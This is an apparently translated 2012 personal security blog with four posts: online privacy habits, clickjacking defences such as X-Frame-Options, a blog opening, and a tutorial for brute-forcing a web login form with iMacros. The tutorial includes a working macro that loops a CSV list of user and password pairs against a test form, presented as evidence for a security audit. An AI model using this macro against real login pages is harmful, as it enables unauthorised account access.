Monday, May 21, 2012

3. Personal image on the Internet: privacy vs control


"Between the idea and the reality, Between the motion and the act, falls the shadow" - T. S. Eliot




Hello!

This will be a different post, that has nothing to do with my original idea of ​​the blog, I will try with an opinion post; yes, it will be not technical and can reach a wider audience (non-technical people) or lesser (is anyone interested?).

The subject on which I want to theorize is the presence on the Internet as an individual, the image that may be obtained from us on the web. Times change and is well known the saying "adapt or die" and I will discuss the evolution of my vision and the reasons that I hold:

  • Anonymous stage
Working in the security world my first stage was to search for absolute privacy, becoming a taliban of privacy:
- I never did Google searches being authenticated in Gmail
- I had Google Analytics IPs in hosts file redirected to my machine (translation: I cut this information flow to Google)
- No Facebook, Tuenti and similars
- Etc., etc., etc.

  • Paranoic stage
One day I created me a Facebook account with the sole purpose to avoid someone supplant me and, at the same time, find out what people could tell about me. Sincerely, I distrust of my closest friends; in all aspects of life they make me to be alert day and night: p (there are some antecedents of one forum that I had to close due to force majeure).

  • Opening stage
Social networking and web 2.0 are making a very important social and technological change and, as part of this world and, especially, as computer engineer, I could not stay aside, so I started to open up me to the possibility of be part of it and try to know these technologies.

I especially remember the conversation I had with my friend and former chief Javier Megias (@jmegias), who is very active on Twitter, about this social network. He explained to me that, after the first stage of using it as a source of current information, Twitter lets you to create an own "brand", to define yourself in the network, providing visibility of your work, profile and concerns.

  • Self-portrait stage
After outlining the various stages that I have had, it's time to justify the moment I find myself

It is necesary to be conscious that the data we upload to the Internet are no longer our own, we lose control over them. To illustrate, I put a link to a video I used in a talk about privacy on the Internet some years ago, but it remains very valid:



The message is clear: "Think before you post"

Therefore, knowing that uploading something to the Internet we lose control over it, that I  recommend  is to have strong control over every word or image. You may wonder, "but why I can not be natural and publish whatever I want?" Because one simple reason, you haven't bounded the visibility of this information, you can't define the scope limits of those words. Let's go to see it with an example:

- Do you speak  the same way with a policeman and with your friends? So, are you  hypocrite ? No,  you just have to know to be in every situation or environment. But, what happens if you can't be sure who's listening? That you must moderate yourself, just in case. Then, on the Internet do the same.

There are several examples of hard consequences to the publication of information on the Net, it include a dismissal due to the information posted on Facebook (the man at work said he was sick and then published photographs about his "holidays"); or that nowadays at 80% of divorce proceedings in the USA  it is used information from social networks and private chats; or fairly recent, on Twitter, one situation in wich I want to focus for more detailed reading.

It turns out that two British boys had planned to go on holiday to the USA, and they published some tweets announcing that they were going to have the big party with sentences like "we are going to burn Troy" or to "destroy America", seemingly harmless phrases. So, what their surprise was?, that on landing in the USA they were detained and later they were sent back home (original news in www.dailymail.co.uk). This is because FBI has acknowledged publicly that they are dedicated to monitor social networks.

After trying to raise awareness of the importance of strict control of published information, I'm going to detail some of the  measures  that I'm having nowadays:
  • I use Google+ social network, but I have turned off the famous "instant upload" (automatic upload of pictures taked with the phone to your account)
  • I don't take me naked photos and I'll never do it, neither with my normal camera, neither with one smartphone (do you know the #scarlettjohanssoning case?)
  • I don't use Google Latitude, why always I have to be located? I like my intimacy
  • I use Foursquare despite the loss of privacy because I appreciate its benefits
  • I have disabled the geotagging of photos
  • I try to avoid giving many clues that I'm on vacation and so my house is completely uninhabited at the mercy of burglars. There are some websites dedicated exclusively to find out if a certain individual may be on vacation but I think it best not to put any link
  • I want to implement an XXX measure of protection in my laptop that is XXX used and consist in XXX the webcam with XXX or similar, just in case...
  • I want to implement an archaic measure of protection on my laptop that already use @chemaalonso, which involves covering the webcam with a adhesive plaster or similar, just in case ...
Recently, I have readed one article by @enriquedans in wich he commented that, as we know, nowadays all human resources department  that prides itself performs a Google search for information on applicants, but therea are some that even not ask you for the resumé,   the information they find on the net will serve as your cover letter. The article is this: XXXX ¿Curriculum vitae? Are you from the past? (in spanish)

So, after this long discourse (mental note: write shorter posts) on whether to hide or publish without fear, I advocate for control, and the conclusion is simple: Paint yourself!



Well, this article lends itself well to opinions, so I encourage you to leave yours and see the different views in comments. 

Greetings!


NOTE: This is a non-automatic translation of the original blog written in spanish. I hope you are comprehending and tell me if you find errors. Thanks a lot!

Sunday, May 13, 2012

2. Clickjacking protection


"Work to prevent crime not to need punishment" - Confucius




Hello!

In this second post, I'm going to talk about different measures that have been used to avoid clickjacking's techniques or click kidnapping, whose definition in spanish I link from Wikipedia or, even more developed, in english.

I must admit that I fought against these measures when I was trying to bypass one restriction that, furthermore, it wasn't a click kidnapping strictly, instead I was trying to load a popular page (whose name I don't want to remember) in a frame. My intention was to interact with this page from an own frame using Javascript.




However, I found several counter-measures trying to avoid the above behavior to preclude the technic of click kidnapping. This is because this capacity can be forced to get control of the users click.


I was trying to develop the concept of clickjacking when I found a very good explanation that I recommend you read on a blog that I did not known, as it is clearly explained: http://rooibo.wordpress.com/2008/10/05/clickjacking-a-fondo-y-con-ejemplos/ (in spanish)

So let's look at the defenses that have been used to prevent this attack.


One possible solution is to use complements for browser (extensions or plugins) which protect against this attack. The first option is the popular NoScript for Firefox, which allows define a white list of domains you trust to run Javascript. However, this option does not apply to everyone, by the added complexity and, above all, because it shifts the responsibility to end users, who need not know anything about Clickjacking, Javascript or flux capacitors.

Then, I understand that it isn't the user's responsibility, controls must be moved to server-side.

The most popular option has always been the insertion of own Javascript code in the web code, to hinder as much as possible this attack; it has been used non-standard measures ad-hoc developed with the best programmers make plus the obfuscation of this code. These protections are target by a constant attempt to circumvent it, so in the most popular pages we have seen real racing of measures, counter-measures, counter-counter-measures, etc.

In the following link we can see how it is develop a Javascript code to prevent a web page being included within a "frame-buster" and also shows how it is possible to bypass that protection "frame-buster-buster": StackOverflow Frame buster buster.

Well, here I stood, trying to get my counter-counter-prottection_against_frames, fighting with Javascript, when I realized that there was a new measure of protection that exceeded this approach of cat and mouse.

And this measure is a simple idea that Microsoft implemented in IE8, a meta tag that is inserted into the header of HTML code that don't want to be included in a framework, named X-FRAME-OPTION. Thus, when the browser sees this tag, means that page don't want to be included in one frame and it don't load it. This measure soon became a de facto standard, implemented in most browsers.

So the only way to bypass this protection is to modify the user's browser, thus preventing a massive attack.

So, with this, my idea was definitely frustrated because my intention was to add functionality to this website, not to deceive the user into installing an add-on that modifies their browser's function, for this purpose is more ethical and easy to make a plugin to get directly the desired functionality.

Well, this is not a post to teach a technique of attack or audit, quite the contrary, how to protect a web as a result of not being able to get an "extra functionality".

Greetings!

PS: This post has needed more than 3 months to get out, when my intention was at least monthly. I promise to put me the batteries and the next will be out long before, I have several ideas that I'm working.


NOTE: This is a non-automatic translation of the original blog written in spanish. I hope you are comprehending and tell me if you find errors. Thanks a lot!

Thursday, February 16, 2012

1. Brute-foce password testing with iMacros!


"In order to achieve what is possible, you have to try the impossible over and over again" - Hermann Hesse



Hello!

In this post, my first with content, I'm going to present an alternative to usual brute-force tools used to get credentials in a portal.

The story begins one day, in wich I was auditing a website with a vulnerable form to brute-force attacks (because it didn't implement waiting times between requests), and I wanted to provide an evidence because, as you know, is not the same to say "fire burns" that  "put your hand here and you will see what warm it is", the second option is more shocking.

So I tried to use one of the most popular tools for this purpose, Medusa / Hydra, and I was going crazy trying to write the order that fits with that form, but no way. The problem was that the identifiers of the form fields were dynamically generated with JavaScript and  it have the nice habit of  change, so I could not reference it (if anyone knows how, please explain it to me).

Discarding the use of common tools I thought to use iMacros, presented as an extension for Firefox (and also part of the excellent suite FireCat or Mantra), which lets you automate tasks in the browser with a lot of versatility. 

I know iMacros a few years ago due to a friend, Mr Adrian Capdevila. He used it to automate repetitive tasks and, later, some restless minds export this idea to play with advantage in some web games.

The fact is that this extension allows you to record a task and then repeat it over and over again and this, in essence, is like a brute force attack, just had to see if I could handle variable data, as the title "try the impossible over and over again" and that may "achieve what is possible".

So, as you can imagine having written the article, finally I could get it and I'm going to explain how:

  • We entered our target form (you can see a very simple example I created for the occasion, as it does not look very ethical to show a real case that could be easily reused) and we load the extension.





  • Then, in the "Rec" tab the click mode should be X/Y, since the value of the HTML tag was changing and it is not useful.



  • Then we click on "Record" button and take necessary steps for a connection attempt, which are:
    • Click in user text area, "Usuario"
    • Write user name (anything)
    • Click in password text area, "Contraseña"
    • Write password (anything)
    • Click Login button, "Autenticar"
    • Click in "Stop"
    • Save generated file with "Save"

NOTE: It is very important to perform these actions with mouse clicks and not by pressing Tab or Enter keys, because we want to register the positions where we clicked.



  • The file looks like:
VERSION BUILD=7400919 RECORDER=FX
TAB T=1
URL GOTO=http://10.0.0.5/index.html
CLICK X=324 Y=113
TAG POS=1 TYPE=INPUT:TEXT FORM=ACTION:/cgi-bin/validate.pl ATTR=NAME:user CONTENT=usuario
CLICK X=324 Y=113 CONTENT=usuario
CLICK X=324 Y=140
SET !ENCRYPTION NO
CONTENT=contrasenya
CLICK X=192 Y=164


  • That can be simplified to:
VERSION BUILD=7400919 RECORDER=FX
TAB T=1
URL GOTO=http://10.0.0.5/index.html
CLICK X=324 Y=113 CONTENT=usuario
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT={{!COL2}}
CLICK X=192 Y=164


  • We can test its performance on the "Play" tab and, if it goes well, then we have a base that can be modified to work in iterative mode.

  • Now it is necessary to add a file as a data source with users and passwords. In this case I used a file in CSV format because iMacros handles it very well and with a little Perl script I previously completed a few lines in the format "user", "password".
' File with users and passwords for testing. This is a CSV with 2 columns
SET !DATASOURCE /home/users/jluispellicer/dictionary.csv
SET !DATASOURCE_COLUMNS 2
 

  • The following must be define iteration on this file with LOOP! command.
 ' We start recursion with the initial value 1
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}

  • And, finally, substitute values ​​with variables that contain the file data.
 ' Fill name
CLICK X=324 Y=113 CONTENT={{!COL1}}

' Fill password
CLICK X=324 Y=140 CONTENT={{!COL2}}

  • This is the final code with comments, that works on my form.
VERSION BUILD=7400919 RECORDER=FX

' Close all tab but the current
TAB CLOSEALLOTHERS
TAB T=1

File with users and passwords for testing. This is a CSV with 2 columns 
SET !DATASOURCE /home/users/jluispellicer/dictionary.csv
SET !DATASOURCE_COLUMNS 2

We start recursion with the initial value 1 
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}

' Close page
'URL GOTO=http://10.0.0.5/index.html

' Fill name
CLICK X=324 Y=113 CONTENT={{!COL1}}

' Fill password
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT={{!COL2}}

' Click en Login button, Autenticar
CLICK X=192 Y=164



  • Once fully prepared, we launch "Repeat Macro Max" with a high value and clicking on "Play (Loop)" as shown in the following video, with the final success with the password:


As you will see it isn't a very efficient method, as it waits for the page to be fully loaded, and I have not set any stop condition, but iMacros offers many more possibilities, from the web interface you can write to file, use JavaScript code, etc., and furthermore it can be used in different programming languages.

Well, I hope you liked it, if there is any doubt you can ask in the comments and if you want some script or file used you can request it to me without problem. I have not wanted to deep into too much detail, for example, the API extension, not to focus on them, but rather in the possibility of using iMacros for this purpose.


Greetings!


NOTE: This is a non-automatic translation of the original blog written in spanish. I hope you are comprehending and tell me if you find errors. Thanks a lot!

Wednesday, February 15, 2012

0. Blog's opening


"Imagination is more important than knowledge. Knowledge is limited. Imagination encircles the world." - Albert Einstein



Hello!

Strange title for a security blog, right?

Some years ago I am a passive user of Internet, and especially of the security forums and blogs that fill my RSS, where sometimes I have contributed with something but, basically, I've been a big consumer, and today is the day that I considered make the leap and begin to bring in my own blog.

The intention is pretty simple, use a famous quote to introduce a security article. These "articles" will consist usually drafted guidelines for myself on some task that I had to do and I have decided to save for future, because my memory is not a place I consider reliable.

I don't know the rhythm that I will carry with publications, I hope that at least once a month and see if this encourages participation and no ends up being an extension of my repository "howtos".

Greetings!


NOTE: This is a non-automatic translation of the original blog written in spanish. I hope you are comprehending and tell me if you find errors. Thanks a lot!